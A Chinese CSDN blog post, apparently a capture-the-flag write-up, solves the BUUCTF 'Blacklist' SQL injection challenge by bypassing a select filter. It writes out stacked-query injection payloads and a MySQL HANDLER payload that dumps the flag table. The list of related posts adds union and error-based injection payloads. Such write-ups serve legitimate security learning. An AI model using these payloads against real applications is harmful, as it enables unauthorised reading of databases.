BUUCTF WEB blacklist1

最新推荐文章于 2023-01-01 16:28:11 发布
最新推荐文章于 2023-01-01 16:28:11 发布
阅读量151 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120986089
版权
本文探讨了SQL注入攻击中如何通过堆叠注入获取数据库、表和列名,重点在于应对select语句被过滤的情况。作者分享了三种思路,但指出在不同靶场中可能存在过滤差异,比如大小写敏感性。文章提到了MySQL的Handler方法作为解决方案,并给出了参考链接和视频教程。
摘要由CSDN通过智能技术生成

之前做过这题,就当是复习了
堆叠注入得到数据库名,表名,列名

-1';show databases;# //得到库名
-1';show tables;# //得到表名
-1';show columns from FlagHere;#//得到列名

下面就是主要点,select被过滤了,这题考的就是这个的过滤思路,三种思路,可以看我之前的文章
https://blog.csdn.net/qq_41696858/article/details/119513224
但是buuctf的靶场和攻防世界的还不一样,攻防世界靶场可以大小写绕过某些过滤,而buuctf不可以,所以方法1,2失效
剩下的只有mysql带的handler

-1';handler `FlagHere` open;handler `FlagHere` read first;#

参考视频链接:https://www.bilibili.com/video/BV1534y1U731/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF WEB [GYCTF2020]Blacklist
Y1da的博客
04-18 254
BUUCTF WEB [GYCTF2020]Blacklist 提交1',报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 发现注入点 尝试union注入 /?inject=1' union select 1,2
BUUCTF [web专项31][GYCTF2020]Blacklist
最新发布
yanglinchiji的博客
11-07 56
我记得原本我总结了两种方法,一种是用handler获取flag,另一种是替换words的数据来进行输出获取flag。ok了,rename,alter被过滤掉了,第二种方法不行,还是用handler吧。而且只能获取1,2的数据,其他数据(数字,字符等)全都不显示好像。坏了,好熟悉的感觉,好像之前做过类似的题目,甚至大致模板都一样。我记得是用堆叠注入来获取库表之类的。第二种:顶替words来输出数据。出来了,进入FlagHere。第一种:handler。
WEB-buuctf-black list
weixin_52804141的博客
01-01 139
buuctf black list
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1625
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
[GYCTF2020] web题-Blacklist
BROTHERYY的博客
07-24 531
复现环境:buuoj.cn 打开题目 发现过滤了一些关键字 发现跟强网杯的随便注一样,可以使用堆叠注入。 可以看到有FlagHere和words这两个表,过滤了一些关键字 这里使用mysql特有的查询-handler 通过handler table_name open打开一张表,在这里声明一个名为table_name的句柄。 通过handler table_name read first获取句柄的第一行,通过read next依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。 详细的
android_system_blacklist_android_msm8610_
10-03
1. **qcom**:这通常表示这是针对高通(Qualcomm)处理器的优化或配置文件。QCOM是高通公司的代码别名,里面可能包含针对MSM8610的驱动程序、库或者其他专有设置。 2. **netd**:Netd是Android系统的网络守护进程,...
dec.zip_WEB开发_PHP_
08-09
从这些文件名可以推测,这个压缩包可能提供了一个简单的Web应用框架,涵盖了用户认证(login.php)、数据验证(verify.php)、HTTP请求处理(get.php)以及可能的自定义功能(fmi.php)和安全措施(BlackList.php)...
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
02-05
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1134
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 370
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1379
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 796
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
安全攻防知识-7】CTFweb(1)
qq_26579613的博客
06-01 4278
ctf-web题型总结
Buuctf [GYCTF2020]Blacklist
qq_53030229的博客
10-26 215
文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、检查源码2、使用堆叠注入1、判断是否存在注入点2、使用堆叠注入3、获取flag 一、知识拓展 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据 1、我在mi数据库中创建了一个数据表 2、使用handler读取数据 总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开 HANDLER
BUUCTF-Blacklist
m0_47571887的博客
11-10 689
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
buuctf-Blacklist
m0_62094846的博客
03-28 658
?inject=1' order by 2--+ 过滤了很多关键词,就有select,好像绕不过 试试报错注入 ?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+ 数据库:surpersqli 因为过滤了太多,报错注入不了,只能试试别的了 堆叠注入 ?inject=-1';use supersqli;show tables--+ 查出两个表:FlagHere,words 接下来查字段...
BUUCTF[GYCTF2020]Blacklist
weixin_45253622的博客
05-22 317
sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过。 可用的还有,or and unionshow 输入:1 or 1=1 无反应 输入:1' or '1' ='1如下: 字符型注入,由于show可用,所以我们想到堆叠注入: 1';show tables; 查看字段名, 1';show columns from FlagHere; 过滤机制过于强大,所以我们使用handler, HANDLER...OPEN语句打开一个表,使其可以使用...
Android平台通信Blacklist服务设计及实战开发
本篇论文深入探讨了在Android平台下通信Blacklist服务的设计与实现。作者徐鹏,信息工程学院通信工程专业,学号20084882,在导师马强讲师和乌日娜讲师的指导下完成。随着移动设备技术的快速发展,智能手机已超越传统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值